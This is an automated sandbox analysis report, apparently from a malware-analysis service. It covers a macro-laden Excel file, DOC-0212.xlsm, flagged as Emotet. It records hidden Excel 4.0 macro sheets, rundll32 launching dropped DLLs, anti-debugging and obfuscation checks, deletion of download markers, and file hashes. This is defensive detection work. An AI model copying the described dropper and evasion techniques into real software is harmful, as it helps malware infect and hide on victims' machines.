Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AFE9D	6_2_001AFE9D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B0A93	6_2_001B0A93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BCE90	6_2_001BCE90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B0E97	6_2_001B0E97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AF48A	6_2_001AF48A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AA083	6_2_001AA083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C1CDB	6_2_001C1CDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B52D1	6_2_001B52D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A90D4	6_2_001A90D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B28D5	6_2_001B28D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A2CC2	6_2_001A2CC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A46FA	6_2_001A46FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A1EFB	6_2_001A1EFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A84F0	6_2_001A84F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B62F5	6_2_001B62F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B4CF5	6_2_001B4CF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AC0EA	6_2_001AC0EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B56E9	6_2_001B56E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A40E2	6_2_001A40E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A4D1E	6_2_001A4D1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001ACB13	6_2_001ACB13
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B970A	6_2_001B970A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BE10A	6_2_001BE10A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B590E	6_2_001B590E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B3D0C	6_2_001B3D0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BBF0C	6_2_001BBF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AF73B	6_2_001AF73B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BCD35	6_2_001BCD35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AA92F	6_2_001AA92F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B6540	6_2_001B6540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C0370	6_2_001C0370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001ABD61	6_2_001ABD61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B1591	6_2_001B1591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AB191	6_2_001AB191
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A7795	6_2_001A7795
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A358B	6_2_001A358B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A8D80	6_2_001A8D80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A4B81	6_2_001A4B81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B85B8	6_2_001B85B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A43BE	6_2_001A43BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A59BF	6_2_001A59BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BD7BE	6_2_001BD7BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BE3B5	6_2_001BE3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B89A2	6_2_001B89A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BE5A7	6_2_001BE5A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BDDA5	6_2_001BDDA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B0BA4	6_2_001B0BA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A75D2	6_2_001A75D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A19C0	6_2_001A19C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BEDED	6_2_001BEDED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A51EC	6_2_001A51EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AA3E7	6_2_001AA3E7

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E44AC90 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E431DE0 appears 97 times

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: CC82.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Found a hidden Excel 4.0 Macro sheet

Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk2
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk5
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk1
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk7
Source: DOC-0212.xlsm	Macro extractor: Sheet name: EFEWF
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk3
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk4
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk6

Excel documents contains an embedded macro which executes code when the document is opened

Source: workbook.xml

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$DOC-0212.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDD92.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@8/7@2/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889

Binary or memory string: .VBPud<_

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: CC82.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC13E7 push esi; retf	3_2_01EC13F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E456A93 push ecx; ret	3_2_6E456AA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A13E7 push esi; retf	6_2_001A13F0

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E43E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,

3_2_6E43E690

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy)	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\besta.ocx	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy)

Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\besta.ocx

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\besta.ocx

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll

Jump to dropped file

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Code function: 0_2_025E6753 rdtsc

0_2_025E6753

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E450927 FindFirstFileExW,

3_2_6E450927

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E44AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_6E44AB0C

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E43E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,

3_2_6E43E690

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E431290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree,

3_2_6E431290

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Code function: 0_2_025E6753 rdtsc

0_2_025E6753

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED07D2 mov eax, dword ptr fs:[00000030h]	3_2_01ED07D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E449990 mov eax, dword ptr fs:[00000030h]	3_2_6E449990
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E44EC0B mov ecx, dword ptr fs:[00000030h]	3_2_6E44EC0B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E4502CC mov eax, dword ptr fs:[00000030h]	3_2_6E4502CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E449920 mov esi, dword ptr fs:[00000030h]	3_2_6E449920
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E449920 mov eax, dword ptr fs:[00000030h]	3_2_6E449920
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B07D2 mov eax, dword ptr fs:[00000030h]	6_2_001B07D2

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E44A462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6E44A462
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E44AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E44AB0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E450326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E450326

HIPS / PFW / Operating System Protection Evasion:

Yara detected Xls With Macro 4.0

Source: Yara match

File source: app.xml, type: SAMPLE

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy			Jump to behavior

Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E44A584 cpuid

3_2_6E44A584

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E44A755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_6E44A755

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 3.2.rundll32.exe.2ab960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2ab960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp, type: MEMORY

ID:	532596
Product:	CloudBasic
Start time:	14:30:41
Start date:	02.12.2021
Sample:	DOC-0212.xlsm
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	aa4f296ed678b18394a365861777241c
SHA1:	cedfd0d995958b8550f36d037c732854e23c68c5
SHA256:	20d3da22e72baf1a0e865621f9bb0af55998db0c4c534e847f30a084113eec8c
Filetype:	Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	A328C761D2F253534919BFF4FB3C89B4	3186F77C6E45D7D61A678C34F09D8D2BDE35DF1A	FFD90DEC5A531AFABD4E63A87B029C829404F83454D43DE5BAE0CC97912F25FC
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8FA61E5.png	PNG image data, 1714 x 241, 8-bit colormap, non-interlaced	4FE798EE522800691796BC9446918C90	1E01CDE49D0B1B5E2F0DFBAD568DC2ECFBEDEAD3	EC0BC049D3D30C29567806EB2D555589CD2E1B6B30E9145F77B73A32EC1C1087
C:\Users\user\AppData\Local\Temp\CC82.tmp	Composite Document File V2 Document, Cannot read section info	72F5C05B7EA8DD6059BF59F50B22DF33	D5AF52E129E15E3A34772806F6C5FBF132E7408E	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
C:\Users\user\AppData\Local\Temp\~DF09EB9009A60E04D7.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\Desktop\~$DOC-0212.xlsm	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\user\besta.ocx	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	A328C761D2F253534919BFF4FB3C89B4	3186F77C6E45D7D61A678C34F09D8D2BDE35DF1A	FFD90DEC5A531AFABD4E63A87B029C829404F83454D43DE5BAE0CC97912F25FC
C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy)	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	A328C761D2F253534919BFF4FB3C89B4	3186F77C6E45D7D61A678C34F09D8D2BDE35DF1A	FFD90DEC5A531AFABD4E63A87B029C829404F83454D43DE5BAE0CC97912F25FC

Windows Analysis Report DOC-0212.xlsm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs